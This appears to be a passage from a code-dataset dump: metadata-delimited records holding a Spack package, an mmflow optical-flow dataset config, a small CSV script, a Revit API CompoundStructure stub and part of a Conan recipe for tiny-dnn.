# SPDX-License-Identifier: (Apache-2.0 OR MIT)
from spack import *
class Libtlx(CMakePackage):
""" tlx is a collection of C++ helpers and extensions universally needed,
but not found in the STL.
The most important design goals and conventions are:
1) high modularity with as little dependencies between
modules as possible.
2) attempt to never break existing interfaces.
3) compile on all platforms with C++ - smartphones, supercomputers,
windows, etc.
4) zero external dependencies: no additional libraries are required.
5) warning and bug-freeness on all compilers.
6) keep overhead down - small overall size such that is can be included
without bloating applications."""
homepage = "https://tlx.github.io/"
url = "https://github.com/tlx/tlx/archive/v0.5.20191212.tar.gz"
maintainers = ['fabratu']
version('0.5.20191212', sha256='5e67d3042a390dbb831b6d46437e3c7fadf738bff362aa7376b210b10ecd532d')
| 40.586207 | 102 | 0.700935 |
edf8a1e360cb12d9f1a05dcdf4604547c60c1867 | 3,215 | py | Python | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 481 | 2021-11-16T07:04:23.000Z | 2022-03-31T22:21:21.000Z | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 72 | 2021-11-16T12:25:55.000Z | 2022-03-28T13:10:45.000Z | configs/_base_/datasets/sintel_384x768.py | hologerry/mmflow | 40caf064851bd95317424e31cc137c0007a2bece | [
"Apache-2.0"
] | 48 | 2021-11-16T06:48:46.000Z | 2022-03-30T12:46:40.000Z | dataset_type = 'Sintel'
data_root = 'data/Sintel'
img_norm_cfg = dict(mean=[0., 0., 0.], std=[255., 255., 255.], to_rgb=False)
crop_size = (384, 768)
global_transform = dict(
translates=(0.05, 0.05),
zoom=(1.0, 1.5),
shear=(0.86, 1.16),
rotate=(-10., 10.))
relative_transform = dict(
translates=(0.00375, 0.00375),
zoom=(0.985, 1.015),
shear=(1.0, 1.0),
rotate=(-1.0, 1.0))
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_occ=True),
dict(
type='ColorJitter',
brightness=0.5,
contrast=0.5,
saturation=0.5,
hue=0.5),
dict(type='RandomGamma', gamma_range=(0.7, 1.5)),
dict(type='Normalize', **img_norm_cfg),
dict(type='GaussianNoise', sigma_range=(0, 0.04), clamp_range=(0., 1.)),
dict(type='RandomFlip', prob=0.5, direction='horizontal'),
dict(type='RandomFlip', prob=0.5, direction='vertical'),
dict(
type='RandomAffine',
global_transform=global_transform,
relative_transform=relative_transform),
dict(type='RandomCrop', crop_size=crop_size),
dict(type='DefaultFormatBundle'),
dict(
type='Collect',
keys=['imgs', 'flow_gt'],
meta_keys=[
'img_fields', 'ann_fields', 'filename1', 'filename2',
'ori_filename1', 'ori_filename2', 'filename_flow',
'ori_filename_flow', 'ori_shape', 'img_shape', 'img_norm_cfg'
]),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations'),
dict(type='InputResize', exponent=6),
dict(type='Normalize', **img_norm_cfg),
dict(type='TestFormatBundle'),
dict(
type='Collect',
keys=['imgs'],
meta_keys=[
'flow_gt', 'filename1', 'filename2', 'ori_filename1',
'ori_filename2', 'ori_shape', 'img_shape', 'img_norm_cfg',
'scale_factor', 'pad_shape'
])
]
sintel_clean_train = dict(
type=dataset_type,
pipeline=train_pipeline,
data_root=data_root,
test_mode=False,
pass_style='clean')
sintel_final_train = dict(
type=dataset_type,
pipeline=train_pipeline,
data_root=data_root,
test_mode=False,
pass_style='final')
sintel_clean_test = dict(
type=dataset_type,
pipeline=test_pipeline,
data_root=data_root,
test_mode=True,
pass_style='clean')
sintel_final_test = dict(
type=dataset_type,
pipeline=test_pipeline,
data_root=data_root,
test_mode=True,
pass_style='final')
data = dict(
train_dataloader=dict(
samples_per_gpu=1,
workers_per_gpu=5,
drop_last=True,
persistent_workers=True),
val_dataloader=dict(
samples_per_gpu=1,
workers_per_gpu=5,
shuffle=False,
persistent_workers=True),
test_dataloader=dict(samples_per_gpu=1, workers_per_gpu=5, shuffle=False),
train=[sintel_clean_train, sintel_final_train],
val=dict(
type='ConcatDataset',
datasets=[sintel_clean_test, sintel_final_test],
separate_eval=True),
test=dict(
type='ConcatDataset',
datasets=[sintel_clean_test, sintel_final_test],
separate_eval=True))
| 27.956522 | 78 | 0.630793 |
41c00185f3f6bcecc7cdc0c4dfef08229fb18611 | 130 | py | Python | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | 1 | 2021-04-21T16:20:05.000Z | 2021-04-21T16:20:05.000Z | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | null | null | null | old_versions/old_scripts/csv_to_json_2.py | jschmidtnj/OutlookContacts | baccc43e77ea3e9e0feb56564d4a2aa9413be884 | [
"MIT"
] | 1 | 2020-04-02T16:20:44.000Z | 2020-04-02T16:20:44.000Z | import csv
ifile = open('outlook_contacts.CSV', "r", encoding="ascii")
read = csv.reader(ifile)
for row in read :
print (row) | 26 | 60 | 0.684615 |
c3ba9b1cb3ab93fa946e76309a1184e5f1dec73e | 30,761 | py | Python | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | release/stubs.min/Autodesk/Revit/DB/__init___parts/CompoundStructure.py | YKato521/ironpython-stubs | b1f7c580de48528490b3ee5791b04898be95a9ae | [
"MIT"
] | null | null | null | class CompoundStructure(object, IDisposable):
""" Describes the internal structure of a wall,floor,roof or ceiling. """
def AddWallSweep(self, wallSweepInfo):
"""
AddWallSweep(self: CompoundStructure,wallSweepInfo: WallSweepInfo)
Adds a new wall sweep or reveal to the compound structure.
wallSweepInfo: The wall sweep info to create a wall sweep.
"""
pass
def AssociateRegionWithLayer(self, regionId, layerIdx):
"""
AssociateRegionWithLayer(self: CompoundStructure,regionId: int,layerIdx: int)
Associates a region with a layer.
regionId: The id of a region.
layerIdx: The index of a layer in this CompoundStructure.
"""
pass
def CanLayerBeStructuralMaterial(self, layerIndex):
"""
CanLayerBeStructuralMaterial(self: CompoundStructure,layerIndex: int) -> bool
Identifies if the input layer can be designated as defining the structural
material for this structure.
layerIndex: Index of a layer in the CompoundStructure.
Returns: True if the input layer may be used to define the structural material and false
otherwise.
"""
pass
def CanLayerBeVariable(self, variableLayerIndex):
"""
CanLayerBeVariable(self: CompoundStructure,variableLayerIndex: int) -> bool
Identifies if the input layer can be designated as a variable thickness layer.
variableLayerIndex: Index of a layer in the CompoundStructure.
Returns: True if the input layer may be a variable thickness layer and false otherwise.
"""
pass
def CanLayerWidthBeNonZero(self, layerIdx):
"""
CanLayerWidthBeNonZero(self: CompoundStructure,layerIdx: int) -> bool
Identifies if changing the width of an existing layer from zero to a positive
value will create a rectangular region.
layerIdx: The index of a CompoundStructureLayer.
"""
pass
def ChangeRegionWidth(self, regionId, newWidth):
"""
ChangeRegionWidth(self: CompoundStructure,regionId: int,newWidth: float) -> bool
Adjust the width of an existing simple region.
regionId: The id of a region.
newWidth: The desired width of the specified region.
Returns: True if newWidth is zero and the region was deleted.
"""
pass
def ClearWallSweeps(self, wallSweepType):
"""
ClearWallSweeps(self: CompoundStructure,wallSweepType: WallSweepType)
Removes all sweeps or reveals from the compound structure.
wallSweepType: The type of a wall sweep.
"""
pass
@staticmethod
def CreateSimpleCompoundStructure(layers):
""" CreateSimpleCompoundStructure(layers: IList[CompoundStructureLayer]) -> CompoundStructure """
pass
@staticmethod
def CreateSingleLayerCompoundStructure(*__args):
"""
CreateSingleLayerCompoundStructure(layerFunction: MaterialFunctionAssignment,width: float,materialId: ElementId) -> CompoundStructure
Creates a CompoundStructure containing a single layer.
layerFunction: The function of the single layer.
width: The width of the single layer.
materialId: The ElementId of the material for the single layer.
Returns: The newly created compound structure.
CreateSingleLayerCompoundStructure(sampleHeight: float,layerFunction: MaterialFunctionAssignment,width: float,materialId: ElementId) -> CompoundStructure
Creates a vertically compound CompoundStructure with one layer.
sampleHeight: The sample height of this vertically compound structure.
layerFunction: The function of the single layer.
width: The width of the single layer.
materialId: The ElementId of the material for the single layer.
Returns: The newly created compound structure.
"""
pass
def DeleteLayer(self, layerIdx):
"""
DeleteLayer(self: CompoundStructure,layerIdx: int) -> bool
Deletes the specified layer from this CompoundStructure.
layerIdx: The layer index is zero based. It counts from the exterior of wall and from the
top of roofs,floors and ceilings.
Returns: True if the layer was successfully deleted,and false otherwise.
"""
pass
def Dispose(self):
""" Dispose(self: CompoundStructure) """
pass
def FindEnclosingRegionAndSegments(
self, gridUV, splitDirection, segmentId1, segmentId2
):
"""
FindEnclosingRegionAndSegments(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> (int,int,int)
Given a pair of grid coordinates,and a direction for splitting,returns the
enclosing region and the two segments
intersected by a line through the
grid point.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: Returns the id of the enclosing region,and -1 if no region encloses the point.
"""
pass
def GetAdjacentRegions(self, segmentId):
"""
GetAdjacentRegions(self: CompoundStructure,segmentId: int) -> IList[int]
Gets the ids of region bound to a specified segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The ids of the regions that are bounded by the specified segment.
"""
pass
def GetCoreBoundaryLayerIndex(self, shellLayerType):
"""
GetCoreBoundaryLayerIndex(self: CompoundStructure,shellLayerType: ShellLayerType) -> int
Returns the index of the layer just below the core boundary.
shellLayerType: If ShellLayerType.Exterior return the index on the exterior side (or top side
for a roof,floor,or ceiling type).
If ShellLayerType.Interior return the
index on the interior side (or bottom side for a roof,floor,or ceiling type).
Returns: The index of the layer.
"""
pass
def GetDeckEmbeddingType(self, layerIdx):
"""
GetDeckEmbeddingType(self: CompoundStructure,layerIdx: int) -> StructDeckEmbeddingType
Retrieves the deck embedding type used for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The embedding type of the structural deck associated to the specified layer.
Invalid if it is not a structural deck.
"""
pass
def GetDeckProfileId(self, layerIdx):
"""
GetDeckProfileId(self: CompoundStructure,layerIdx: int) -> ElementId
Retrieves the profile loop used for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The element id of a FamilySymbol which contains a profile loop used by a
structural deck associated to the specified layer,
or invalidElementId if
isStructuralDeck(layerIdx) is false.
"""
pass
def GetExtendableRegionIds(self, top):
"""
GetExtendableRegionIds(self: CompoundStructure,top: bool) -> IList[int]
Gets the extendable region ids for the compound structure.
top: If true,retrieve ids of regions which are extendable at the top,otherwise
retrieve the ids of regions which are extendable at the bottom.
Returns: An array of region ids which are marked extendable.
"""
pass
def GetFirstCoreLayerIndex(self):
"""
GetFirstCoreLayerIndex(self: CompoundStructure) -> int
Gets the index of the first core layer.
Returns: The index of the first core layer.
"""
pass
def GetLastCoreLayerIndex(self):
"""
GetLastCoreLayerIndex(self: CompoundStructure) -> int
Gets the index of the last core layer.
Returns: The index of the last core layer.
"""
pass
def GetLayerAssociatedToRegion(self, regionId):
"""
GetLayerAssociatedToRegion(self: CompoundStructure,regionId: int) -> int
Gets the layer associated to a particular region.
regionId: The id of a region.
Returns: The index of a layer in this CompoundStructure.
"""
pass
def GetLayerFunction(self, layerIdx):
"""
GetLayerFunction(self: CompoundStructure,layerIdx: int) -> MaterialFunctionAssignment
Retrieves the function of the specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The function of the layer.
"""
pass
def GetLayers(self):
"""
GetLayers(self: CompoundStructure) -> IList[CompoundStructureLayer]
A copy of the layers which define this compound structure.
Returns: The layers,returned in order (Exterior to Interior for walls,top to bottom
for roofs,floors or ceilings). The index of each layer in this array
can
be used in other CompoundStructure methods accepting a layer index.
"""
pass
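# Illustrative sketch (IronPython usage; hedged: assumes a WallType obtained
# elsewhere exposes this structure via GetCompoundStructure()):
#   cs = wall_type.GetCompoundStructure()
#   widths = [cs.GetLayerWidth(i) for i in range(len(cs.GetLayers()))]
#   core_first, core_last = cs.GetFirstCoreLayerIndex(), cs.GetLastCoreLayerIndex()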
def GetLayerWidth(self, layerIdx):
"""
GetLayerWidth(self: CompoundStructure,layerIdx: int) -> float
Retrieves the width of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The width of the specified layer.
"""
pass
def GetMaterialId(self, layerIdx):
"""
GetMaterialId(self: CompoundStructure,layerIdx: int) -> ElementId
Retrieves the material element id of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
Returns: The material element id.
"""
pass
@staticmethod
def GetMinimumLayerThickness():
"""
GetMinimumLayerThickness() -> float
Get the minimum allowable layer thickness.
Returns: The minimum allowable width of a layer in feet.
"""
pass
def GetNumberOfShellLayers(self, shellLayerType):
"""
GetNumberOfShellLayers(self: CompoundStructure,shellLayerType: ShellLayerType) -> int
Retrieves the number of interior or exterior shell layers.
shellLayerType: If ShellLayerType.Exterior return the number of exterior shell layers (or top
shell layers for a roof,floor,or ceiling type).
If
ShellLayerType.Interior return the number of interior shell layers (or bottom
shell layers for a roof,floor,or ceiling type).
Returns: The number of shell layers in the interior or exterior shell,as specified by
shellLayerType.
"""
pass
def GetOffsetForLocationLine(self, wallLocationLine):
"""
GetOffsetForLocationLine(self: CompoundStructure,wallLocationLine: WallLocationLine) -> float
Returns the offset from the center of the compound structure to the given
location line value.
wallLocationLine: The alignment type of the wall's location line.
Returns: The offset.
"""
pass
def GetPreviousNonZeroLayerIndex(self, thisIdx):
"""
GetPreviousNonZeroLayerIndex(self: CompoundStructure,thisIdx: int) -> int
Returns the index of the nearest non-zero width layer before this layer.
thisIdx: The layer from which to look for a non-zero width layer.
Returns: The index of the layer found.
"""
pass
def GetRegionEnvelope(self, regionId):
"""
GetRegionEnvelope(self: CompoundStructure,regionId: int) -> BoundingBoxUV
Gets the envelope that a specified region spans.
regionId: The id of the region.
Returns: The envelope of the region.
"""
pass
def GetRegionIds(self):
"""
GetRegionIds(self: CompoundStructure) -> IList[int]
Gets the region ids of this compound structure.
Returns: The ids of the regions defining this CompoundStructure.
"""
pass
def GetRegionsAlongLevel(self, height):
"""
GetRegionsAlongLevel(self: CompoundStructure,height: float) -> IList[int]
        Returns the ids of the regions encountered as the vertically compound structure
        is traversed at a constant height above the bottom of a wall to which this
        structure is applied.
height: Distance from the bottom of the wall.
Returns: The ids of the regions intersected by the specified line.
"""
pass
def GetRegionsAssociatedToLayer(self, layerIdx):
"""
GetRegionsAssociatedToLayer(self: CompoundStructure,layerIdx: int) -> IList[int]
Gets the set of region ids associated to a particular layer.
layerIdx: The index of a layer in this CompoundStructure.
Returns: An array of region ids which are associated to the specified layer.
"""
pass
def GetSegmentCoordinate(self, segmentId):
"""
GetSegmentCoordinate(self: CompoundStructure,segmentId: int) -> float
Gets the coordinate of a segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The local coordinates of the specified segment.
"""
pass
def GetSegmentEndPoints(self, segmentId, regionId, end1, end2):
"""
GetSegmentEndPoints(self: CompoundStructure,segmentId: int,regionId: int) -> (UV,UV)
Gets the end points of a segment.
segmentId: The segment id.
regionId: The region id.
"""
pass
def GetSegmentIds(self):
"""
GetSegmentIds(self: CompoundStructure) -> IList[int]
Gets the segment ids of this compound structure.
Returns: The ids of the segments which form the boundary of the regions of this
CompoundStructure.
"""
pass
def GetSegmentOrientation(self, segmentId):
"""
GetSegmentOrientation(self: CompoundStructure,segmentId: int) -> RectangularGridSegmentOrientation
Gets the orientation of a segment.
segmentId: The id of a segment in this CompoundStructure.
Returns: The orientation of the specified segment.
"""
pass
def GetSimpleCompoundStructure(self, wallHeight, distAboveBase):
"""
GetSimpleCompoundStructure(self: CompoundStructure,wallHeight: float,distAboveBase: float) -> CompoundStructure
        Takes a horizontal slice through a sample wall to which this CompoundStructure
        is applied and returns a simple compound structure which describes that slice,
        i.e. a series of parallel layers.
        wallHeight: The height of the wall.
        distAboveBase: The distance from the base of the wall at which to take the section.
        If distAboveBase < 0, then internally distAboveBase=0 is used.
        If distAboveBase > wallHeight, then internally distAboveBase=wallHeight is used.
Returns: A simple CompoundStructure representing a series of parallel layers.
"""
pass
def GetWallSweepsInfo(self, wallSweepType):
"""
GetWallSweepsInfo(self: CompoundStructure,wallSweepType: WallSweepType) -> IList[WallSweepInfo]
Obtains a list of the intrinsic wall sweeps or reveals in this
CompoundStructure.
wallSweepType: Whether to obtain wall sweeps or reveals.
Returns: An array which describes the intrinsic wall sweeps or reveals.
"""
pass
def GetWidth(self, regionId=None):
"""
GetWidth(self: CompoundStructure,regionId: int) -> float
Computes the width of the envelope (2d bounding box) of the specified region.
regionId: The id of a region in this vertically compound structure.
Returns: The width of the envelope (2d bounding box) of the region.
GetWidth(self: CompoundStructure) -> float
The width implied by this compound structure.
Returns: The width of a host object with this compound structure.
"""
pass
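    # A hypothetical usage sketch (not part of the original stub): assuming a
    # CompoundStructure obtained from a wall type (``wall_type`` is an assumed name),
    # the per-layer widths documented above should, for a simple set of parallel
    # layers, add up to the overall width reported by GetWidth().
    #
    #   cs = wall_type.GetCompoundStructure()
    #   total = 0.0
    #   for idx in range(cs.LayerCount):
    #       total += cs.GetLayerWidth(idx)
    #   assert abs(total - cs.GetWidth()) < 1e-9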
def IsCoreLayer(self, layerIdx):
"""
IsCoreLayer(self: CompoundStructure,layerIdx: int) -> bool
Checks if the specified layer is a core layer.
layerIdx: The index of a layer in this CompoundStructure.
Returns: Returns true if the layer is within the core layer boundary,false if it is in
the interior or exterior shell layers.
"""
pass
def IsEqual(self, otherStructure):
"""
IsEqual(self: CompoundStructure,otherStructure: CompoundStructure) -> bool
Checks whether this CompoundStructure is the same as another CompoundStructure.
otherStructure: A CompoundStructure.
Returns: True if the two CompoundStructures are the same,and false otherwise.
"""
pass
def IsLayerValid(self, layerIdx, layer):
"""
IsLayerValid(self: CompoundStructure,layerIdx: int,layer: CompoundStructureLayer) -> bool
Verifies that the data in this layer is internally consistent.
layerIdx: The index of the layer in the compound structure to be set.
layer: The layer to be set.
Returns: True if the layer is internally consistent,false if the layer is not
internally consistent.
"""
pass
def IsRectangularRegion(self, regionId):
"""
IsRectangularRegion(self: CompoundStructure,regionId: int) -> bool
Determines whether the specified region is rectangular.
regionId: The id of a region.
Returns: True if the specified region is a rectangle,false otherwise.
"""
pass
def IsSimpleRegion(self, regionId):
"""
IsSimpleRegion(self: CompoundStructure,regionId: int) -> bool
Determines whether the region is a simple region in this CompoundStructure.
regionId: The id of a region in this vertically compound structure.
Returns: True if the region is simple,false otherwise.
"""
pass
def IsStructuralDeck(self, layerIdx):
"""
IsStructuralDeck(self: CompoundStructure,layerIdx: int) -> bool
Determines whether a specified layer is a structural deck.
layerIdx: Index of a layer in the CompoundStructure.
Returns: True if specified layer is a structural deck,and false otherwise.
"""
pass
def IsValid(self, doc, errMap, twoLayerErrorsMap):
""" IsValid(self: CompoundStructure,doc: Document) -> (bool,IDictionary[int,CompoundStructureError],IDictionary[int,int]) """
pass
def IsValidRegionId(self, regionId):
"""
IsValidRegionId(self: CompoundStructure,regionId: int) -> bool
Determines whether the specified integer is actually the id of a region in this
CompoundStructure.
regionId: The id of a region in this vertically compound structure.
Returns: True if the region is valid,false otherwise.
"""
pass
def IsValidSampleHeight(self, height):
"""
IsValidSampleHeight(self: CompoundStructure,height: float) -> bool
Is the specified height a valid sample height for this compound structure?
"""
pass
def IsValidSegmentId(self, segmentId):
"""
IsValidSegmentId(self: CompoundStructure,segmentId: int) -> bool
Determines whether the specified integer is actually the id of a segment in
this CompoundStructure.
segmentId: The id of a segment in this CompoundStructure.
Returns: True if the specified segment is valid,false otherwise.
"""
pass
def IsVerticallyHomogeneous(self):
"""
IsVerticallyHomogeneous(self: CompoundStructure) -> bool
Indicates whether this CompoundStructure represents a single set of parallel
layers.
Returns: True if this CompoundStructure represents a series of parallel layers that
stretch from bottom to top,false otherwise.
"""
pass
def MergeRegionsAdjacentToSegment(self, segmentId, layerIdxForMergedRegion):
"""
MergeRegionsAdjacentToSegment(self: CompoundStructure,segmentId: int,layerIdxForMergedRegion: int) -> int
Merges the two regions which share the specified segment.
segmentId: The id of a segment in the underlying grid.
layerIdxForMergedRegion: The index of the layer to which the resulting region will be associated.
        Returns: The id of the resulting region. If -1 is returned, then the operation
        would have produced an invalid region and was not performed.
"""
pass
def ParticipatesInWrapping(self, layerIdx):
"""
ParticipatesInWrapping(self: CompoundStructure,layerIdx: int) -> bool
Identifies if a layer is included in wrapping at inserts and ends.
layerIdx: The index of the layer.
Returns: If true,then the layer participates in wrapping at inserts and openings. If
false,the layer will not
participate in wrapping.
"""
pass
def ReleaseUnmanagedResources(self, *args):
""" ReleaseUnmanagedResources(self: CompoundStructure,disposing: bool) """
pass
def RemoveWallSweep(self, wallSweepType, id):
"""
RemoveWallSweep(self: CompoundStructure,wallSweepType: WallSweepType,id: int)
Removes a single sweep or reveal from the compound structure.
wallSweepType: The type of a wall sweep.
id: The id of the sweep or reveal to remove.
"""
pass
def SetDeckEmbeddingType(self, layerIdx, embedType):
"""
SetDeckEmbeddingType(self: CompoundStructure,layerIdx: int,embedType: StructDeckEmbeddingType)
Sets the deck embedding type to use for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
embedType: The embedding type to be used by the specified layer if it is a structural deck.
"""
pass
def SetDeckProfileId(self, layerIdx, profileId):
"""
SetDeckProfileId(self: CompoundStructure,layerIdx: int,profileId: ElementId)
Sets the profile loop to use for the specified structural deck.
layerIdx: Index of a layer in the CompoundStructure.
profileId: The element id of a FamilySymbol which contains a profile loop to be used by
the specified layer if it is a structural deck.
"""
pass
def SetExtendableRegionIds(self, top, regionIds):
""" SetExtendableRegionIds(self: CompoundStructure,top: bool,regionIds: IList[int]) """
pass
def SetLayer(self, layerIdx, layer):
"""
SetLayer(self: CompoundStructure,layerIdx: int,layer: CompoundStructureLayer)
Sets a single layer for this CompoundStructure.
layerIdx: The index of a layer. This should range from 0 to the number of layers - 1.
layer: The layer to be set.
"""
pass
def SetLayerFunction(self, layerIdx, function):
"""
SetLayerFunction(self: CompoundStructure,layerIdx: int,function: MaterialFunctionAssignment)
Sets the function of the specified layer.
layerIdx: Index of a layer in the CompoundStructure.
function: The function of the layer.
"""
pass
def SetLayers(self, layers):
""" SetLayers(self: CompoundStructure,layers: IList[CompoundStructureLayer]) """
pass
def SetLayerWidth(self, layerIdx, width):
"""
SetLayerWidth(self: CompoundStructure,layerIdx: int,width: float)
Sets the width of a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
width: The new width of the specified layer.
"""
pass
def SetMaterialId(self, layerIdx, materialId):
"""
SetMaterialId(self: CompoundStructure,layerIdx: int,materialId: ElementId)
Sets a material element for a specified layer.
layerIdx: Index of a layer in the CompoundStructure.
materialId: The ElementId of a Material element.
"""
pass
def SetNumberOfShellLayers(self, shellLayerType, numLayers):
"""
SetNumberOfShellLayers(self: CompoundStructure,shellLayerType: ShellLayerType,numLayers: int)
Sets the number of interior or exterior shell layers.
        shellLayerType: If ShellLayerType.Exterior, set the number of exterior shell layers (or top
        shell layers for a roof, floor, or ceiling type). If ShellLayerType.Interior, set the
        number of interior shell layers (or bottom shell layers for a roof, floor, or ceiling type).
numLayers: The number of layers to be in the specified shell.
"""
pass
def SetParticipatesInWrapping(self, layerIdx, participatesInWrapping):
"""
SetParticipatesInWrapping(self: CompoundStructure,layerIdx: int,participatesInWrapping: bool)
Assigns if a layer is included in wrapping at inserts and ends.
layerIdx: The index of the layer.
participatesInWrapping: True if the specified layer will participate in wrapping at inserts and ends,
false otherwise.
"""
pass
def SplitRegion(self, gridUV, splitDirection, newSegmentId=None):
"""
SplitRegion(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> (int,int)
Splits the region which contains the specified grid point by a line with the
specified direction.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: The id of the region created by this operation.
SplitRegion(self: CompoundStructure,gridUV: UV,splitDirection: RectangularGridSegmentOrientation) -> int
Splits the region which contains the specified grid point by a line with the
specified direction.
gridUV: Coordinates of a point in the rectangular grid of this compound structure.
splitDirection: Specifies the direction of the split.
Returns: The id of the region created by this operation.
"""
pass
def __enter__(self, *args):
""" __enter__(self: IDisposable) -> object """
pass
def __exit__(self, *args):
""" __exit__(self: IDisposable,exc_type: object,exc_value: object,exc_back: object) """
pass
def __init__(self, *args):
""" x.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signaturex.__init__(...) initializes x; see x.__class__.__doc__ for signature """
pass
def __repr__(self, *args):
""" __repr__(self: object) -> str """
pass
CutoffHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Horizontal segments below or at the cutoff height have their distance to the wall bottom fixed,those above
have their distance to the wall top fixed.
Get: CutoffHeight(self: CompoundStructure) -> float
Set: CutoffHeight(self: CompoundStructure)=value
"""
EndCap = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Indicates the end cap condition defining which shell layers will participate in end wrapping.
Get: EndCap(self: CompoundStructure) -> EndCapCondition
Set: EndCap(self: CompoundStructure)=value
"""
HasStructuralDeck = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Checks if the compound structure has a structural deck.
Get: HasStructuralDeck(self: CompoundStructure) -> bool
"""
IsEmpty = property(lambda self: object(), lambda self, v: None, lambda self: None)
"""Checks whether this CompoundStructure is empty.
Get: IsEmpty(self: CompoundStructure) -> bool
"""
IsValidObject = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Specifies whether the .NET object represents a valid Revit entity.
Get: IsValidObject(self: CompoundStructure) -> bool
"""
IsVerticallyCompound = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Identifies if this CompoundStructure represents a layout that is more complicated than a simple set of parallel layers.
Get: IsVerticallyCompound(self: CompoundStructure) -> bool
"""
LayerCount = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Returns the number of layers contained in this CompoundStructure.
Get: LayerCount(self: CompoundStructure) -> int
"""
MinimumSampleHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The minimum sample height determined by the current sample height and the horizontal segments.
Get: MinimumSampleHeight(self: CompoundStructure) -> float
"""
OpeningWrapping = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the opening wrapping condition defining which shell layers of a wall,in plan view,wrap at inserts and openings.
Get: OpeningWrapping(self: CompoundStructure) -> OpeningWrappingCondition
Set: OpeningWrapping(self: CompoundStructure)=value
"""
SampleHeight = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""The sample height is the presumed height of the wall to which the data in this CompoundStructure is applied.
Get: SampleHeight(self: CompoundStructure) -> float
Set: SampleHeight(self: CompoundStructure)=value
"""
StructuralMaterialIndex = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the layer whose material defines the structural properties of the type for the purposes of analysis.
Get: StructuralMaterialIndex(self: CompoundStructure) -> int
Set: StructuralMaterialIndex(self: CompoundStructure)=value
"""
VariableLayerIndex = property(
lambda self: object(), lambda self, v: None, lambda self: None
)
"""Indicates the index of the layer which is designated as variable.
Get: VariableLayerIndex(self: CompoundStructure) -> int
Set: VariableLayerIndex(self: CompoundStructure)=value
"""
| 23.698767 | 221 | 0.670102 |
b3a57165d52a3f350379f6992bb2c9476c2eee19 | 4,114 | py | Python | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | 1 | 2021-11-11T03:07:13.000Z | 2021-11-11T03:07:13.000Z | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | 1 | 2022-03-09T06:33:41.000Z | 2022-03-09T06:33:41.000Z | recipes/tiny-dnn/all/conanfile.py | marsven/conan-center-index | d8bb4ad617cee02d8664e8341fa32cdf702e4284 | [
"MIT"
] | null | null | null | from conans import ConanFile, CMake, tools
from conans.errors import ConanInvalidConfiguration
import os
required_conan_version = ">=1.43.0"
class TinyDnnConan(ConanFile):
name = "tiny-dnn"
license = "BSD-3-Clause"
url = "https://github.com/conan-io/conan-center-index"
homepage = "https://github.com/tiny-dnn/tiny-dnn"
description = "tiny-dnn is a C++14 implementation of deep learning."
topics = ("header-only", "deep-learning", "embedded", "iot", "computational")
settings = "os", "arch", "compiler", "build_type"
options = {
"with_tbb": [True, False],
}
default_options = {
"with_tbb": False,
}
exports_sources = "CMakeLists.txt"
# TODO: if you move this recipe to CMakeDeps, be aware that tiny-dnn
# relies on CMake variables which are not defined in CMakeDeps, only
# in cmake_find_package. So patch it before.
generators = "cmake", "cmake_find_package"
@property
def _source_subfolder(self):
return "source_subfolder"
@property
def _min_cppstd(self):
return "14"
@property
def _min_compilers_version(self):
return {
"gcc": "5",
"clang": "3.4",
"apple-clang": "10",
"Visual Studio": "14"
}
def requirements(self):
self.requires("cereal/1.3.1")
self.requires("stb/cci.20210713")
if self.options.with_tbb:
self.requires("onetbb/2020.3")
def validate(self):
if self.settings.compiler.get_safe("cppstd"):
tools.check_min_cppstd(self, self._min_cppstd)
compiler = str(self.settings.compiler)
version = tools.Version(self.settings.compiler.version)
if compiler in self._min_compilers_version and version < self._min_compilers_version[compiler]:
raise ConanInvalidConfiguration(
"{} requires a compiler that supports at least C++{}".format(
self.name, self._min_cppstd,
)
)
def package_id(self):
